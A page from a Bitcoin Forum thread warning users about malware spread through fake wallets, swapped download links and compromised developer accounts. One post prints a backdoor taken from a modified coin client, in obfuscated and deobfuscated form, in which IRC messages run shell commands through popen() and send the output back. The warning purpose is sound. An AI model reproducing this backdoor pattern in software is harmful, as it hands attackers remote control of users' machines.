Bitcoin Forum
January 05, 2026, 11:18:59 AM *
News: Latest Bitcoin Core release: 30.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42] 43 44 45 46 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 899780 times)
JayCue
Full Member
***
Offline Offline

Activity: 854
Merit: 100



View Profile WWW
October 04, 2018, 02:31:02 PM
 #821

I was one of the victims of this malware 'scams' who took all my Minexcoin. My anti-virus didn't alert me of any suspicious activity on my pc until I open my wallet with a zero balance. I just wish I did stake my MNX on the minex bank.  Cry

⌐      ERC-20 Token to pay Goods and Services      ¬
▬▬▬▬    ██ █▌█ ▌ b y z b i t ▐ █▐█ ██    ▬▬▬▬
└   Whitepaper   Telegram   Medium   Twitter   Facebook   Linkedin   ┘
⌐      ERC-20 Token to pay Goods and Services      ¬
▬▬▬▬    ██ █▌█ ▌ b y z b i t ▐ █▐█ ██    ▬▬▬▬
└   Whitepaper   Telegram   Medium   Twitter   Facebook   Linkedin   ┘
Myno
Newbie
*
Offline Offline

Activity: 22
Merit: 0


View Profile
October 06, 2018, 04:36:11 PM
 #822

Basic , thanks representing your distribution . This data is extremely significant representing each fellow of this assembly . That's a extremely devil-may-care conflict , reason should anyone achieve that. We have to be deliberate of malware assails and have to study many almost how to keep off them.
Wylokel
Newbie
*
Offline Offline

Activity: 33
Merit: 0


View Profile
October 14, 2018, 07:25:56 PM
 #823

Any actions have to be entranced which are great sufficiency to keep safe your organizations to be hacked much as not to apply unnamed exe, apply of unix which look as if to be fewer vunarable to virus.
Who I
Full Member
***
Offline Offline

Activity: 420
Merit: 111



View Profile
October 27, 2018, 02:48:15 PM
 #824

Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to attack bitcoin mining viruses. 3 days I was attacked by them
intsol
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
October 28, 2018, 11:40:23 AM
 #825

Yes, attacks are getting more sophisticated.
There are also .SCR "screenshot" downloads being circulated in Telegram groups.
These are actually malware Screensaver EXE's which are able to scrape private keys.

Take Care out there

intsol
SandraStark
Full Member
***
Offline Offline

Activity: 504
Merit: 107



View Profile
November 01, 2018, 11:56:30 PM
 #826

Thank you very much for the information! I didn't even know about such a infection ... I always try to sidestep various unfamiliar programs ... But for example, more and more conditions are encountered in bounty campaigns - download the wallet ...This is often alarming. Especially if the project does not inspire confidence, even after reading the white paper. Recently I found out that telegrams actively distribute links in chat rooms on behalf of well-known projects whose files contain a virus ... When you open a file, it loads, it is not just viewed in the chat.
 
weblife
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile WWW
November 24, 2018, 02:08:03 AM
 #827

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
OMG thank you for warning this kind of "hacking"





Hermelda
Newbie
*
Offline Offline

Activity: 42
Merit: 0


View Profile
November 29, 2018, 05:50:08 AM
 #828

The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one who’s Dropbox is encrypted by Cryptoware.. Dropbox can put back a backup until 30 days I believe. Don’t wait to long contacting them.
levitacrossfirevlt
Jr. Member
*
Offline Offline

Activity: 88
Merit: 2


View Profile
November 30, 2018, 12:40:43 PM
 #829

I am happy that there are good people, who on seeing this tries to alert people why nowadays, it is very difficult to combat this programs a simple page can damage your computer, thank you, I will check my computer
jabrix
Member
**
Offline Offline

Activity: 397
Merit: 10


View Profile
March 11, 2019, 04:06:43 AM
 #830

Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to attack bitcoin mining viruses. 3 days I was attacked by them
It's better to keep from attacking bad viruses, because they steal data or something valuable that is on the computer or site that we have. They are very sophisticated.
Various ways that are often used are they come in when we are browsing on the internet, and infect computers for the purpose they want. Therefore computers must be observed frequently to ensure that no viruses enter. Besides using anti-virus that is quite reliable.

  ●   TOKPIE   ●
 ❰❰❰❰❰❰  GET ETHEREUM FOR YOUR BOUNTY STAKES  ❱❱❱❱❱❱  
● ▬▬▬▬▬ ● ▬▬▬▬▬ ●●●    ●  instantly & regularly  ●    ●●● ▬▬▬▬▬ ● ▬▬▬▬▬ ●
chan-lee
Newbie
*
Offline Offline

Activity: 9
Merit: 0


View Profile
March 22, 2019, 04:45:45 PM
 #831

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Yeah, I think so, too.
So we need to be careful virus.
Virus will catch our chrome cookie, so they can have our account info.
As that account, they attack master's laptop or use it for attacking other site as fake identity.
Mrsparks
Jr. Member
*
Offline Offline

Activity: 406
Merit: 5

I-CHAIN - The Revolution of Digital Advertising


View Profile WWW
March 23, 2019, 08:35:10 AM
 #832

Sometimes I wonder why humans are so malicious? I have taken note of this cited examples above but please do well to update us on any further threats available on this forum.. So we all can stay safe..

[     I C A      |      icacoin.com      |      IEO is live on Sept 2019     ]
━ ━━━   The Revolution of Digital Advertising   ━━━ ━
chan-lee
Newbie
*
Offline Offline

Activity: 9
Merit: 0


View Profile
March 24, 2019, 03:54:04 PM
 #833

Sometimes I wonder why humans are so malicious? I have taken note of this cited examples above but please do well to update us on any further threats available on this forum.. So we all can stay safe..
Roll Eyes
Well.
But you can have solution.
For all web account,especially like binance and bitmex, and paypal account, you need to be enable 2FA verify.
So hacker cant access easily to your account.
 Wink Wink Wink
Dinmazsae
Member
**
Offline Offline

Activity: 308
Merit: 10


View Profile
April 14, 2019, 12:44:42 PM
 #834

The number of cases of cyber crime by using malware cannot be tolerated. A solution is needed to handle the case.
Malware is a term used for malicious software designed to damage or carry out unwanted actions on a computer system or what we call viruses.
Computer viruses often spread through e-mail message attachments or instant messages. Therefore, you may not open e-mail attachments unless you know who sent the message or unless you were expecting e-mail attachments. Viruses can masquerade as attachments to funny pictures, greeting cards, or audio and video files. Viruses can hide in pirated software or other files that you download.
tunapa
Jr. Member
*
Offline Offline

Activity: 667
Merit: 1


View Profile
April 20, 2019, 03:20:59 AM
 #835

this is really not a good thing, this forum is meant to offer help and provide solutions to any issues or problems that anyone might be facing in the crypto currency community. now some people have decided to be manipulative and cause more harm by creating more problems and infecting peoples computers with malwares that seem to be a help to download wallet links. thanks for bringing this up. we all need to be more careful and do things with extra care especially now that there are too many bad people.
jigawagawa
Jr. Member
*
Offline Offline

Activity: 61
Merit: 1


View Profile
April 26, 2019, 03:29:55 PM
Last edit: April 26, 2019, 08:03:29 PM by jigawagawa
 #836

These malware's are very common on Telegram Telegram especially, just last week I fell for one and got every file on my phone wiped off, it was a very painful experience for me. I learnt my lesson though, it's just sad I had to learn the hard way. This post has gone a step further in preventing more people from falling.
Kafanchanchan
Jr. Member
*
Offline Offline

Activity: 55
Merit: 1


View Profile
April 26, 2019, 03:32:00 PM
Last edit: April 26, 2019, 08:46:35 PM by Kafanchanchan
 #837

Yeah, one comes across these malware's easily on Telegram and other similar platform, just be careful and look well before clicking on any link thrown at you on those platform. Most times they are out to cause harm
Odetolala
Jr. Member
*
Offline Offline

Activity: 48
Merit: 1


View Profile
April 26, 2019, 03:34:29 PM
Last edit: April 26, 2019, 10:37:48 PM by Odetolala
 #838

2FA does the magic for me, just that most times after battling with those malwares I end up losing very vital files, that will go a long way in hurting me to bits. So the best option still remains to stay safe, watch on links you click and the places you go on the internet
jigawagawa
Jr. Member
*
Offline Offline

Activity: 61
Merit: 1


View Profile
April 27, 2019, 08:28:56 PM
Merited by shahim (1)
 #839


One has to be very careful here, it is even very possible to get your phone infected for days without you getting to know.

Ways to know that your mobile device infected.
You will realise that your device might suddenly begin to slow down tremendously, many malicious apps asking you to claim items you won will be popping from nowhere, app will keep crashing unexpectedly. Then funny and very strange sounds will begin to emanate from the said phone.

Here are some ways by which hackers could get your device infected

A) compromised apps: one very common way to get your device infected is downloading an application that was specifically designed for the said purpose (infecting your device), these hackers usually repackage and rebrand these applications, making it look like it is the original, once you download and install on your device, that's it, your device will be infected with whichever malware that was  
set up on it.

How to prevent it
Never download applications from random sources, always use a link from the official website of platforms that own the application. That way, you are guaranteed of downloading the real application.

B) Malvertising: this is another very common method used by hackers to steal personal information of users, it's done by making certain ads pop on the interface of targeted websites while surfing, the moment users mistakingly click on them, his/her device automatically get infected with the virus.

How to prevent it
Always avoid clicking on random ads, alternatively you can download ad blockers to help block off suck ads from popping while surfing the internet.
Umkar
Member
**
Offline Offline

Activity: 364
Merit: 10


View Profile
May 09, 2019, 01:56:21 PM
 #840

Trojans can still get to your android device via the Telegram application, because everyone has auto-loading of video, audio and documents in the default settings. My android tablet thus became infected with several different Trojans. Therefore, in the settings, disable autoloading of video, audio, photos, this will partially protect your phone.
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42] 43 44 45 46 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!